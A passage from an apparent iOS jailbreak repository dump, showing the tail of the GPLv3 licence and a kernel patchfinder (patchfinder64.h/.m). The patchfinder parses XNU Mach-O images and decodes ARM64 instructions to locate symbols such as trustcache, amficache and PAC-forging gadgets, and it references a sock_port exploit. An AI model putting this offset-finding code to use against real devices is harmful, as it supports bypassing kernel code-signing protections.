WARRANTY\nOF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,\nTHE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\nPURPOSE.  
THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM\nIS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF\nALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n\n  16. Limitation of Liability.\n\n  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS\nTHE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY\nGENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE\nUSE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF\nDATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD\nPARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),\nEVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF\nSUCH DAMAGES.\n\n  17. Interpretation of Sections 15 and 16.\n\n  If the disclaimer of warranty and limitation of liability provided\nabove cannot be given local legal effect according to their terms,\nreviewing courts shall apply local law that most closely approximates\nan absolute waiver of all civil liability in connection with the\nProgram, unless a warranty or assumption of liability accompanies a\ncopy of the Program in return for a fee.\n\n                     END OF TERMS AND CONDITIONS\n\n            How to Apply These Terms to Your New Programs\n\n  If you develop a new program, and you want it to be of the greatest\npossible use to the public, the best way to achieve this is to make it\nfree software which everyone can redistribute and change under these terms.\n\n  To do so, attach the following notices to the program.  
It is safest\nto attach them to the start of each source file to most effectively\nstate the exclusion of warranty; and each file should have at least\nthe \"copyright\" line and a pointer to where the full notice is found.\n\n    <one line to give the program's name and a brief idea of what it does.>\n    Copyright (C) <year>  <name of author>\n\n    This program is free software: you can redistribute it and/or modify\n    it under the terms of the GNU General Public License as published by\n    the Free Software Foundation, either version 3 of the License, or\n    (at your option) any later version.\n\n    This program is distributed in the hope that it will be useful,\n    but WITHOUT ANY WARRANTY; without even the implied warranty of\n    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n    GNU General Public License for more details.\n\n    You should have received a copy of the GNU General Public License\n    along with this program.  If not, see <https://www.gnu.org/licenses/>.\n\nAlso add information on how to contact you by electronic and paper mail.\n\n  If the program does terminal interaction, make it output a short\nnotice like this when it starts in an interactive mode:\n\n    <program>  Copyright (C) <year>  <name of author>\n    This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.\n    This is free software, and you are welcome to redistribute it\n    under certain conditions; type `show c' for details.\n\nThe hypothetical commands `show w' and `show c' should show the appropriate\nparts of the General Public License.  
Of course, your program's commands\nmight be different; for a GUI interface, you would use an \"about box\".\n\n  You should also get your employer (if you work as a programmer) or school,\nif any, to sign a \"copyright disclaimer\" for the program, if necessary.\nFor more information on this, and how to apply and follow the GNU GPL, see\n<https://www.gnu.org/licenses/>.\n\n  The GNU General Public License does not permit incorporating your program\ninto proprietary programs.  If your program is a subroutine library, you\nmay consider it more useful to permit linking proprietary applications with\nthe library.  If this is what you want to do, use the GNU Lesser General\nPublic License instead of this License.  But first, please read\n<https://www.gnu.org/licenses/why-not-lgpl.html>.\n"
  },
  {
    "path": "PatchFinder/patchfinder64.h",
    "content": "#ifndef patchfinder_h\n#define patchfinder_h\n#import <stdint.h>\n#import <string.h>\n#import <stdbool.h>\n#import <mach-o/fat.h>\ntypedef unsigned long long addr_t;\nint initializePatchFinderWithBase(addr_t base, const char *filename);\nvoid terminatePatchFinder(void);\n\n// Fun part\nuint64_t Find_allproc(void);\nuint64_t Find_add_x0_x0_0x40_ret(void);\nuint64_t Find_copyout(void);\nuint64_t Find_bzero(void);\nuint64_t Find_bcopy(void);\nuint64_t Find_rootvnode(void);\nuint64_t Find_trustcache(void);\nuint64_t Find_amficache(void);\nuint64_t Find_pmap_load_trust_cache_ppl(void);\nuint64_t Find_OSBoolean_True(void);\nuint64_t Find_OSBoolean_False(void);\nuint64_t Find_zone_map_ref(void);\nuint64_t Find_osunserializexml(void);\nuint64_t Find_smalloc(void);\nuint64_t Find_sbops(void);\nuint64_t Find_bootargs(void);\nuint64_t Find_vfs_context_current(void);\nuint64_t Find_vnode_lookup(void);\nuint64_t Find_vnode_put(void);\nuint64_t Find_cs_gen_count(void);\nuint64_t Find_cs_validate_csblob(void);\nuint64_t Find_kalloc_canblock(void);\nuint64_t Find_cs_blob_allocate_site(void);\nuint64_t Find_kfree(void);\nuint64_t Find_cs_find_md(void);\nuint64_t Find_kernel_memory_allocate(void);\nuint64_t Find_kernel_map(void);\n\n// PAC\nuint64_t Find_l2tp_domain_module_start(void);\nuint64_t Find_l2tp_domain_module_stop(void);\nuint64_t Find_l2tp_domain_inited(void);\nuint64_t Find_sysctl_net_ppp_l2tp(void);\nuint64_t Find_sysctl_unregister_oid(void);\nuint64_t Find_mov_x0_x4__br_x5(void);\nuint64_t Find_mov_x9_x0__br_x1(void);\nuint64_t Find_mov_x10_x3__br_x6(void);\nuint64_t Find_kernel_forge_pacia_gadget(void);\nuint64_t Find_kernel_forge_pacda_gadget(void);\nuint64_t Find_IOUserClient_vtable(void);\nuint64_t Find_IORegistryEntry__getRegistryEntryID(void);\n\n#endif\n"
  },
  {
    "path": "PatchFinder/patchfinder64.m",
    "content": "\n//\n//  patchfinder64.c\n//  extra_recipe\n//\n//  Created by xerub on 06/06/2017.\n//  Copyright © 2017 xerub. All rights reserved.\n//\n\n#import <assert.h>\n#import <stdint.h>\n#import <string.h>\n#import <stdbool.h>\n#import <mach-o/fat.h>\n#include \"../Kernel Utilities/kernel_utils.h\"\n#include \"../Exploits/sock_port/exploit.h\"\n\ntypedef unsigned long long addr_t;\n#define IS64(image) (*(uint8_t *)(image) & 1)\n#define MACHO(p) ((*(unsigned int *)(p) & ~1) == 0xfeedface)\n\n/* generic stuff *************************************************************/\n\n#define UCHAR_MAX 255\n\nstatic unsigned char *\nBoyermoore_horspool_memmem(const unsigned char* haystack, size_t hlen,\n                           const unsigned char* needle,   size_t nlen)\n{\n    size_t last, scan = 0;\n    size_t bad_char_skip[UCHAR_MAX + 1]; /* Officially called:\n                                          * bad character shift */\n    \n    /* Sanity checks on the parameters */\n    if (nlen <= 0 || !haystack || !needle)\n        return NULL;\n    \n    /* ---- Preprocess ---- */\n    /* Initialize the table to default value */\n    /* When a character is encountered that does not occur\n     * in the needle, we can safely skip ahead for the whole\n     * length of the needle.\n     */\n    for (scan = 0; scan <= UCHAR_MAX; scan = scan + 1)\n        bad_char_skip[scan] = nlen;\n    \n    /* C arrays have the first byte at [0], therefore:\n     * [nlen - 1] is the last byte of the array. */\n    last = nlen - 1;\n    \n    /* Then populate it with the analysis of the needle */\n    for (scan = 0; scan < last; scan = scan + 1)\n        bad_char_skip[needle[scan]] = last - scan;\n    \n    /* ---- Do the matching ---- */\n    \n    /* Search the haystack, while the needle can still be within it. 
*/\n    while (hlen >= nlen)\n    {\n        /* scan from the end of the needle */\n        for (scan = last; haystack[scan] == needle[scan]; scan = scan - 1)\n            if (scan == 0) /* If the first byte matches, we've found it. */\n                return (void *)haystack;\n        \n        /* otherwise, we need to skip some bytes and start again.\n         Note that here we are getting the skip value based on the last byte\n         of needle, no matter where we didn't match. So if needle is: \"abcd\"\n         then we are skipping based on 'd' and that value will be 4, and\n         for \"abcdd\" we again skip on 'd' but the value will be only 1.\n         The alternative of pretending that the mismatched character was\n         the last character is slower in the normal case (E.g. finding\n         \"abcd\" in \"...azcd...\" gives 4 by using 'd' but only\n         4-2==2 using 'z'. */\n        hlen     -= bad_char_skip[haystack[last]];\n        haystack += bad_char_skip[haystack[last]];\n    }\n    \n    return NULL;\n}\n\n/* disassembler **************************************************************/\n\nstatic int HighestSetBit(int N, uint32_t imm)\n{\n    int i;\n    for (i = N - 1; i >= 0; i--) {\n        if (imm & (1 << i)) {\n            return i;\n        }\n    }\n    return -1;\n}\n\nstatic uint64_t ZeroExtendOnes(unsigned M, unsigned N)    // zero extend M ones to N width\n{\n    (void)N;\n    return ((uint64_t)1 << M) - 1;\n}\n\nstatic uint64_t RORZeroExtendOnes(unsigned M, unsigned N, unsigned R)\n{\n    uint64_t val = ZeroExtendOnes(M, N);\n    if (R == 0) {\n        return val;\n    }\n    return ((val >> R) & (((uint64_t)1 << (N - R)) - 1)) | ((val & (((uint64_t)1 << R) - 1)) << (N - R));\n}\n\nstatic uint64_t Replicate(uint64_t val, unsigned bits)\n{\n    uint64_t ret = val;\n    unsigned shift;\n    for (shift = bits; shift < 64; shift += bits) {    // XXX actually, it is either 32 or 64\n        ret |= (val << shift);\n    }\n    return 
ret;\n}\n\nstatic int DecodeBitMasks(unsigned immN, unsigned imms, unsigned immr, int immediate, uint64_t *newval)\n{\n    unsigned levels, S, R, esize;\n    int len = HighestSetBit(7, (immN << 6) | (~imms & 0x3F));\n    if (len < 1) {\n        return -1;\n    }\n    levels = ZeroExtendOnes(len, 6);\n    if (immediate && (imms & levels) == levels) {\n        return -1;\n    }\n    S = imms & levels;\n    R = immr & levels;\n    esize = 1 << len;\n    *newval = Replicate(RORZeroExtendOnes(S + 1, esize, R), esize);\n    return 0;\n}\n\nstatic int DecodeMov(uint32_t opcode, uint64_t total, int first, uint64_t *newval)\n{\n    unsigned o = (opcode >> 29) & 3;\n    unsigned k = (opcode >> 23) & 0x3F;\n    unsigned rn, rd;\n    uint64_t i;\n    \n    if (k == 0x24 && o == 1) {            // MOV (bitmask imm) <=> ORR (immediate)\n        unsigned s = (opcode >> 31) & 1;\n        unsigned N = (opcode >> 22) & 1;\n        if (s == 0 && N != 0) {\n            return -1;\n        }\n        rn = (opcode >> 5) & 0x1F;\n        if (rn == 31) {\n            unsigned imms = (opcode >> 10) & 0x3F;\n            unsigned immr = (opcode >> 16) & 0x3F;\n            return DecodeBitMasks(N, imms, immr, 1, newval);\n        }\n    } else if (k == 0x25) {                // MOVN/MOVZ/MOVK\n        unsigned s = (opcode >> 31) & 1;\n        unsigned h = (opcode >> 21) & 3;\n        if (s == 0 && h > 1) {\n            return -1;\n        }\n        i = (opcode >> 5) & 0xFFFF;\n        h *= 16;\n        i <<= h;\n        if (o == 0) {                // MOVN\n            *newval = ~i;\n            return 0;\n        } else if (o == 2) {            // MOVZ\n            *newval = i;\n            return 0;\n        } else if (o == 3 && !first) {        // MOVK\n            *newval = (total & ~((uint64_t)0xFFFF << h)) | i;\n            return 0;\n        }\n    } else if ((k | 1) == 0x23 && !first) {        // ADD (immediate)\n        unsigned h = (opcode >> 22) & 3;\n        if (h > 1) {\n        
    return -1;\n        }\n        rd = opcode & 0x1F;\n        rn = (opcode >> 5) & 0x1F;\n        if (rd != rn) {\n            return -1;\n        }\n        i = (opcode >> 10) & 0xFFF;\n        h *= 12;\n        i <<= h;\n        if (o & 2) {                // SUB\n            *newval = total - i;\n            return 0;\n        } else {                // ADD\n            *newval = total + i;\n            return 0;\n        }\n    }\n    \n    return -1;\n}\n\n/* patchfinder ***************************************************************/\n\nstatic addr_t\nStep64(const uint8_t *buf, addr_t start, size_t length, uint32_t what, uint32_t mask)\n{\n    addr_t end = start + length;\n    while (start < end) {\n        uint32_t x = *(uint32_t *)(buf + start);\n        if ((x & mask) == what) {\n            return start;\n        }\n        start += 4;\n    }\n    return 0;\n}\n\n// str8 = Step64_back(Kernel, ref, ref - bof, INSN_STR8);\nstatic addr_t\nStep64_back(const uint8_t *buf, addr_t start, size_t length, uint32_t what, uint32_t mask)\n{\n    addr_t end = start - length;\n    while (start >= end) {\n        uint32_t x = *(uint32_t *)(buf + start);\n        if ((x & mask) == what) {\n            return start;\n        }\n        start -= 4;\n    }\n    return 0;\n}\n\n// Finds start of function\nstatic addr_t\nBOF64(const uint8_t *buf, addr_t start, addr_t where)\n{\n    extern addr_t PPLText_size;\n    if (PPLText_size) {\n        for (; where >= start; where -= 4) {\n            uint32_t op = *(uint32_t *)(buf + where);\n            if (op == 0xD503237F) {\n                return where;\n            }\n        }\n        return 0;\n    }\n    \n    for (; where >= start; where -= 4) {\n        uint32_t op = *(uint32_t *)(buf + where);\n        \n        if ((op & 0xFFC003FF) == 0x910003FD) {\n            unsigned delta = (op >> 10) & 0xFFF;\n            //printf(\"%x: ADD X29, SP, #0x%x\\n\", where, delta);\n            if ((delta & 0xF) == 0) {\n                
addr_t prev = where - ((delta >> 4) + 1) * 4;\n                uint32_t au = *(uint32_t *)(buf + prev);\n                if ((au & 0xFFC003E0) == 0xA98003E0) {\n                    //printf(\"%x: STP x, y, [SP,#-imm]!\\n\", prev);\n                    if (*(uint32_t *)(buf + prev - 4) == 0xd503237f) return prev - 4;\n                    return prev;\n                }\n                // try something else\n                while (where > start) {\n                    where -= 4;\n                    au = *(uint32_t *)(buf + where);\n                    // SUB SP, SP, #imm\n                    if ((au & 0xFFC003FF) == 0xD10003FF && ((au >> 10) & 0xFFF) == delta + 0x10) {\n                        if (*(uint32_t *)(buf + where - 4) == 0xd503237f) return where - 4;\n                        return where;\n                    }\n                    // STP x, y, [SP,#imm]\n                    if ((au & 0xFFC003E0) != 0xA90003E0) {\n                        where += 4;\n                        break;\n                    }\n                }\n            }\n        }\n    }\n    return 0;\n}\n\nstatic addr_t\nFollow_call64(const uint8_t *buf, addr_t call)\n{\n    long long w;\n    w = *(uint32_t *)(buf + call) & 0x3FFFFFF;\n    w <<= 64 - 26;\n    w >>= 64 - 26 - 2;\n    return call + w;\n}\n\nstatic addr_t\nXREF64(const uint8_t *buf, addr_t start, addr_t end, addr_t what)\n{\n    addr_t i;\n    uint64_t value[32];\n    \n    memset(value, 0, sizeof(value));\n    \n    end &= ~3;\n    for (i = start & ~3; i < end; i += 4) {\n        uint32_t op = *(uint32_t *)(buf + i);\n        unsigned reg = op & 0x1F;\n        if ((op & 0x9F000000) == 0x90000000) {\n            signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8);\n            //printf(\"%llx: ADRP X%d, 0x%llx\\n\", i, reg, ((long long)adr << 1) + (i & ~0xFFF));\n            value[reg] = ((long long)adr << 1) + (i & ~0xFFF);\n            /*} else if ((op & 0xFFE0FFE0) == 0xAA0003E0) {\n             unsigned rd 
= op & 0x1F;\n             unsigned rm = (op >> 16) & 0x1F;\n             //printf(\"%llx: MOV X%d, X%d\\n\", i, rd, rm);\n             value[rd] = value[rm];*/\n        } else if ((op & 0xFF000000) == 0x91000000) {\n            unsigned rn = (op >> 5) & 0x1F;\n            unsigned shift = (op >> 22) & 3;\n            unsigned imm = (op >> 10) & 0xFFF;\n            if (shift == 1) {\n                imm <<= 12;\n            } else {\n                //assert(shift == 0);\n                if (shift > 1) continue;\n            }\n            //printf(\"%llx: ADD X%d, X%d, 0x%x\\n\", i, reg, rn, imm);\n            value[reg] = value[rn] + imm;\n        } else if ((op & 0xF9C00000) == 0xF9400000) {\n            unsigned rn = (op >> 5) & 0x1F;\n            unsigned imm = ((op >> 10) & 0xFFF) << 3;\n            //printf(\"%llx: LDR X%d, [X%d, 0x%x]\\n\", i, reg, rn, imm);\n            if (!imm) continue;            // XXX not counted as true xref\n            value[reg] = value[rn] + imm;    // XXX address, not actual value\n            /*} else if ((op & 0xF9C00000) == 0xF9000000) {\n             unsigned rn = (op >> 5) & 0x1F;\n             unsigned imm = ((op >> 10) & 0xFFF) << 3;\n             //printf(\"%llx: STR X%d, [X%d, 0x%x]\\n\", i, reg, rn, imm);\n             if (!imm) continue;            // XXX not counted as true xref\n             value[rn] = value[rn] + imm;    // XXX address, not actual value*/\n        } else if ((op & 0x9F000000) == 0x10000000) {\n            signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8);\n            //printf(\"%llx: ADR X%d, 0x%llx\\n\", i, reg, ((long long)adr >> 11) + i);\n            value[reg] = ((long long)adr >> 11) + i;\n        } else if ((op & 0xFF000000) == 0x58000000) {\n            unsigned adr = (op & 0xFFFFE0) >> 3;\n            //printf(\"%llx: LDR X%d, =0x%llx\\n\", i, reg, adr + i);\n            value[reg] = adr + i;        // XXX address, not actual value\n        }\n        else if ((op & 
0xFC000000) == 0x94000000) {\n            if (Follow_call64(buf, i) == what) {\n                return i;\n            }\n        }\n        else if ((op & 0xFC000000) == 0x14000000) {\n            if (Follow_call64(buf, i) == what) {\n                return i;\n            }\n        }\n        else if ((op & 0x7F000000) == 0x37000000) {\n            uint64_t addr = i + 4 * ((op & 0x7FFE0) >> 5);\n            if (addr == what) {\n                return i;\n            }\n        }\n        if (value[reg] == what) {\n            return i;\n        }\n    }\n    return 0;\n}\n\nstatic addr_t\nCalc64(const uint8_t *buf, addr_t start, addr_t end, int which)\n{\n    addr_t i;\n    uint64_t value[32];\n    \n    memset(value, 0, sizeof(value));\n    \n    end &= ~3;\n    for (i = start & ~3; i < end; i += 4) {\n        uint32_t op = *(uint32_t *)(buf + i);\n        unsigned reg = op & 0x1F;\n        if ((op & 0x9F000000) == 0x90000000) {\n            signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8);\n            //printf(\"%llx: ADRP X%d, 0x%llx\\n\", i, reg, ((long long)adr << 1) + (i & ~0xFFF));\n            value[reg] = ((long long)adr << 1) + (i & ~0xFFF);\n            /*} else if ((op & 0xFFE0FFE0) == 0xAA0003E0) {\n             unsigned rd = op & 0x1F;\n             unsigned rm = (op >> 16) & 0x1F;\n             //printf(\"%llx: MOV X%d, X%d\\n\", i, rd, rm);\n             value[rd] = value[rm];*/\n        } else if ((op & 0xFF000000) == 0x91000000) {\n            unsigned rn = (op >> 5) & 0x1F;\n            unsigned shift = (op >> 22) & 3;\n            unsigned imm = (op >> 10) & 0xFFF;\n            if (shift == 1) {\n                imm <<= 12;\n            } else {\n                //assert(shift == 0);\n                if (shift > 1) continue;\n            }\n            //printf(\"%llx: ADD X%d, X%d, 0x%x\\n\", i, reg, rn, imm);\n            value[reg] = value[rn] + imm;\n        } else if ((op & 0xFF000000) == 0xd2000000) {\n            
unsigned val = (op & 0x1fffe0) >> 5; // idk if this is really correct but works for our purpose\n            value[reg] = val;\n        }\n        else if ((op & 0xF9C00000) == 0xF9400000) {\n            unsigned rn = (op >> 5) & 0x1F;\n            unsigned imm = ((op >> 10) & 0xFFF) << 3;\n            //printf(\"%llx: LDR X%d, [X%d, 0x%x]\\n\", i, reg, rn, imm);\n            if (!imm) continue;            // XXX not counted as true xref\n            value[reg] = value[rn] + imm;    // XXX address, not actual value\n        } else if ((op & 0xF9C00000) == 0xb9400000) { // 32bit\n            unsigned rn = (op >> 5) & 0x1F;\n            unsigned imm = ((op >> 10) & 0xFFF) << 2;\n            if (!imm) continue;            // XXX not counted as true xref\n            value[reg] = value[rn] + imm;    // XXX address, not actual value\n        } else if ((op & 0xF9C00000) == 0xF9000000) {\n            unsigned rn = (op >> 5) & 0x1F;\n            unsigned imm = ((op >> 10) & 0xFFF) << 3;\n            //printf(\"%llx: STR X%d, [X%d, 0x%x]\\n\", i, reg, rn, imm);\n            if (!imm) continue;            // XXX not counted as true xref\n            value[rn] = value[rn] + imm;    // XXX address, not actual value\n        } else if ((op & 0x9F000000) == 0x10000000) {\n            signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8);\n            //printf(\"%llx: ADR X%d, 0x%llx\\n\", i, reg, ((long long)adr >> 11) + i);\n            value[reg] = ((long long)adr >> 11) + i;\n        } else if ((op & 0xFF000000) == 0x58000000) {\n            unsigned adr = (op & 0xFFFFE0) >> 3;\n            //printf(\"%llx: LDR X%d, =0x%llx\\n\", i, reg, adr + i);\n            value[reg] = adr + i;        // XXX address, not actual value\n        }\n    }\n    return value[which];\n}\n\nstatic addr_t\nCalc64mov(const uint8_t *buf, addr_t start, addr_t end, int which)\n{\n    addr_t i;\n    uint64_t value[32];\n    \n    memset(value, 0, sizeof(value));\n    \n    end &= ~3;\n    
for (i = start & ~3; i < end; i += 4) {\n        uint32_t op = *(uint32_t *)(buf + i);\n        unsigned reg = op & 0x1F;\n        uint64_t newval;\n        int rv = DecodeMov(op, value[reg], 0, &newval);\n        if (rv == 0) {\n            if (((op >> 31) & 1) == 0) {\n                newval &= 0xFFFFFFFF;\n            }\n            value[reg] = newval;\n        }\n    }\n    return value[which];\n}\n\nstatic addr_t\nFind_call64(const uint8_t *buf, addr_t start, size_t length)\n{\n    return Step64(buf, start, length, 0x94000000, 0xFC000000);\n}\n\nstatic addr_t\nFollow_cbz(const uint8_t *buf, addr_t cbz)\n{\n    return cbz + ((*(int *)(buf + cbz) & 0x3FFFFE0) << 10 >> 13);\n}\n\n/* kernel iOS10 **************************************************************/\n\n#import <fcntl.h>\n#import <stdio.h>\n#import <stdlib.h>\n#import <unistd.h>\n#import <mach-o/loader.h>\n\nstatic uint8_t *Kernel = NULL;\nstatic size_t Kernel_size = 0;\n\nstatic addr_t XNUCore_Base = 0;\nstatic addr_t XNUCore_Size = 0;\nstatic addr_t Prelink_Base = 0;\nstatic addr_t Prelink_Size = 0;\nstatic addr_t CString_base = 0;\nstatic addr_t CString_size = 0;\nstatic addr_t PString_base = 0;\nstatic addr_t PString_size = 0;\nstatic addr_t OSLog_base = 0;\nstatic addr_t OSLog_size = 0;\nstatic addr_t Data_base = 0;\nstatic addr_t Data_size = 0;\nstatic addr_t Data_const_base = 0;\nstatic addr_t Data_const_size = 0;\naddr_t PPLText_base = 0;\naddr_t PPLText_size = 0;\n\nstatic addr_t KernDumpBase = -1;\nstatic addr_t Kernel_entry = 0;\nstatic void *Kernel_mh = 0;\nstatic addr_t Kernel_delta = 0;\n\nstatic uint32_t arch_off = 0;\n\nint\ninitializePatchFinderWithBase(addr_t base, const char *filename)\n{\n    size_t rv;\n    uint8_t buf[0x4000];\n    unsigned i, j;\n    const struct mach_header *hdr = (struct mach_header *)buf;\n    const uint8_t *q;\n    addr_t min = -1;\n    addr_t max = 0;\n    int is64 = 0;\n    \n    int fd = open(filename, O_RDONLY);\n    if (fd < 0) {\n        return -1;\n    
}\n    \n    uint32_t magic;\n    read(fd, &magic, 4);\n    lseek(fd, 0, SEEK_SET);\n    if (magic == 0xbebafeca) {\n        struct fat_header fat;\n        lseek(fd, sizeof(fat), SEEK_SET);\n        struct fat_arch_64 arch;\n        read(fd, &arch, sizeof(arch));\n        arch_off = ntohl(arch.offset);\n        lseek(fd, arch_off, SEEK_SET); // kerneldec gives a FAT binary for some reason\n    }\n    \n    rv = read(fd, buf, sizeof(buf));\n    if (rv != sizeof(buf)) {\n        close(fd);\n        return -1;\n    }\n    \n    if (!MACHO(buf)) {\n        close(fd);\n        return -1;\n    }\n    \n    if (IS64(buf)) {\n        is64 = 4;\n    }\n    \n    q = buf + sizeof(struct mach_header) + is64;\n    for (i = 0; i < hdr->ncmds; i++) {\n        const struct load_command *cmd = (struct load_command *)q;\n        if (cmd->cmd == LC_SEGMENT_64) {\n            const struct segment_command_64 *seg = (struct segment_command_64 *)q;\n            if (min > seg->vmaddr) {\n                min = seg->vmaddr;\n            }\n            if (max < seg->vmaddr + seg->vmsize) {\n                max = seg->vmaddr + seg->vmsize;\n            }\n            if (!strcmp(seg->segname, \"__TEXT_EXEC\")) {\n                XNUCore_Base = seg->vmaddr;\n                XNUCore_Size = seg->filesize;\n            }\n            else if (!strcmp(seg->segname, \"__PPLTEXT\")) {\n                PPLText_base = seg->vmaddr;\n                PPLText_size = seg->filesize;\n            }\n            else if (!strcmp(seg->segname, \"__PLK_TEXT_EXEC\")) {\n                Prelink_Base = seg->vmaddr;\n                Prelink_Size = seg->filesize;\n            }\n            else if (!strcmp(seg->segname, \"__DATA_CONST\")) {\n                const struct section_64 *sec = (struct section_64 *)(seg + 1);\n                for (j = 0; j < seg->nsects; j++) {\n                    if (!strcmp(sec[j].sectname, \"__const\")) {\n                        Data_const_base = sec[j].addr;\n                     
   Data_const_size = sec[j].size;\n                    }\n                }\n            }\n            else if (!strcmp(seg->segname, \"__DATA\")) {\n                const struct section_64 *sec = (struct section_64 *)(seg + 1);\n                for (j = 0; j < seg->nsects; j++) {\n                    if (!strcmp(sec[j].sectname, \"__data\")) {\n                        Data_base = sec[j].addr;\n                        Data_size = sec[j].size;\n                    }\n                }\n            }\n            else if (!strcmp(seg->segname, \"__TEXT\")) {\n                const struct section_64 *sec = (struct section_64 *)(seg + 1);\n                for (j = 0; j < seg->nsects; j++) {\n                    if (!strcmp(sec[j].sectname, \"__cstring\")) {\n                        CString_base = sec[j].addr;\n                        CString_size = sec[j].size;\n                    }\n                    if (!strcmp(sec[j].sectname, \"__os_log\")) {\n                        OSLog_base = sec[j].addr;\n                        OSLog_size = sec[j].size;\n                    }\n                }\n            }\n            else if (!strcmp(seg->segname, \"__PRELINK_TEXT\")) {\n                const struct section_64 *sec = (struct section_64 *)(seg + 1);\n                for (j = 0; j < seg->nsects; j++) {\n                    if (!strcmp(sec[j].sectname, \"__text\")) {\n                        PString_base = sec[j].addr;\n                        PString_size = sec[j].size;\n                    }\n                }\n            }\n            else if (!strcmp(seg->segname, \"__LINKEDIT\")) {\n                Kernel_delta = seg->vmaddr - min - seg->fileoff;\n            }\n        }\n        else if (cmd->cmd == LC_UNIXTHREAD) {\n            uint32_t *ptr = (uint32_t *)(cmd + 1);\n            uint32_t flavor = ptr[0];\n            struct {\n                uint64_t x[29];    /* General purpose registers x0-x28 */\n                uint64_t fp;    /* Frame pointer x29 */\n    
            uint64_t lr;    /* Link register x30 */\n                uint64_t sp;    /* Stack pointer x31 */\n                uint64_t pc;     /* Program counter */\n                uint32_t cpsr;    /* Current program status register */\n            } *thread = (void *)(ptr + 2);\n            if (flavor == 6) {\n                Kernel_entry = thread->pc;\n            }\n        }\n        q = q + cmd->cmdsize;\n    }\n    \n    KernDumpBase = min;\n    XNUCore_Base -= KernDumpBase;\n    Prelink_Base -= KernDumpBase;\n    CString_base -= KernDumpBase;\n    PString_base -= KernDumpBase;\n    OSLog_base -= KernDumpBase;\n    Data_base -= KernDumpBase;\n    Data_const_base -= KernDumpBase;\n    PPLText_base -= KernDumpBase;\n    Kernel_size = max - min;\n    \n    Kernel = calloc(1, Kernel_size);\n    if (!Kernel) {\n        close(fd);\n        return -1;\n    }\n    \n    q = buf + sizeof(struct mach_header) + is64;\n    for (i = 0; i < hdr->ncmds; i++) {\n        const struct load_command *cmd = (struct load_command *)q;\n        if (cmd->cmd == LC_SEGMENT_64) {\n            const struct segment_command_64 *seg = (struct segment_command_64 *)q;\n            size_t sz = pread(fd, Kernel + seg->vmaddr - min, seg->filesize, seg->fileoff);\n            if (sz != seg->filesize) {\n                close(fd);\n                free(Kernel);\n                return -1;\n            }\n            if (!Kernel_mh) {\n                Kernel_mh = Kernel + seg->vmaddr - min;\n            }\n            //printf(\"%s\\n\", seg->segname);\n            if (!strcmp(seg->segname, \"__LINKEDIT\")) {\n                Kernel_delta = seg->vmaddr - min - seg->fileoff;\n            }\n        }\n        q = q + cmd->cmdsize;\n    }\n    \n    Kernel += arch_off;\n    \n    close(fd);\n    \n    (void)base;\n    return 0;\n}\n\nvoid\nterminatePatchFinder(void)\n{\n    Kernel -= arch_off;\n    free(Kernel);\n}\n\n/* these operate on VA 
******************************************************/\n\n#define INSN_RET  0xD65F03C0, 0xFFFFFFFF\n#define INSN_CALL 0x94000000, 0xFC000000\n#define INSN_B    0x14000000, 0xFC000000\n#define INSN_CBZ  0x34000000, 0xFC000000\n#define INSN_ADRP 0x90000000, 0x9F000000\n#define INSN_TBNZ 0x37000000, 0x7F000000\n\naddr_t\nFind_register_value(addr_t where, int reg)\n{\n    addr_t val;\n    addr_t bof = 0;\n    where -= KernDumpBase;\n    if (where > XNUCore_Base) {\n        bof = BOF64(Kernel, XNUCore_Base, where);\n        if (!bof) {\n            bof = XNUCore_Base;\n        }\n    } else if (where > Prelink_Base) {\n        bof = BOF64(Kernel, Prelink_Base, where);\n        if (!bof) {\n            bof = Prelink_Base;\n        }\n    }\n    val = Calc64(Kernel, bof, where, reg);\n    if (!val) {\n        return 0;\n    }\n    return val + KernDumpBase;\n}\n\naddr_t\nFind_reference(addr_t to, int n, int type)\n{\n    addr_t ref, end;\n    addr_t base;\n    addr_t size;\n    \n    base = XNUCore_Base;\n    size = XNUCore_Size;\n    \n    if (type == 1) {\n        base = Prelink_Base;\n        size = Prelink_Size;\n    }\n    \n    if (type == 4) {\n        base = PPLText_base;\n        size = PPLText_size;\n    }\n    \n    if (n <= 0) {\n        n = 1;\n    }\n    end = base + size;\n    to -= KernDumpBase;\n    do {\n        ref = XREF64(Kernel, base, end, to);\n        if (!ref) {\n            return 0;\n        }\n        base = ref + 4;\n    } while (--n > 0);\n    return ref + KernDumpBase;\n}\n\n\naddr_t\nFind_strref(const char *string, int n, int type, bool exactMatch)\n{\n    uint8_t *str;\n    addr_t base, size;\n    \n    if (type == 1) {\n        base = PString_base;\n        size = PString_size;\n    }\n    else if (type == 2) {\n        base = OSLog_base;\n        size = OSLog_size;\n    }\n    else if (type == 3) {\n        base = Data_base;\n        size = Data_size;\n    }\n    else {\n        base = CString_base;\n        size = CString_size;\n    
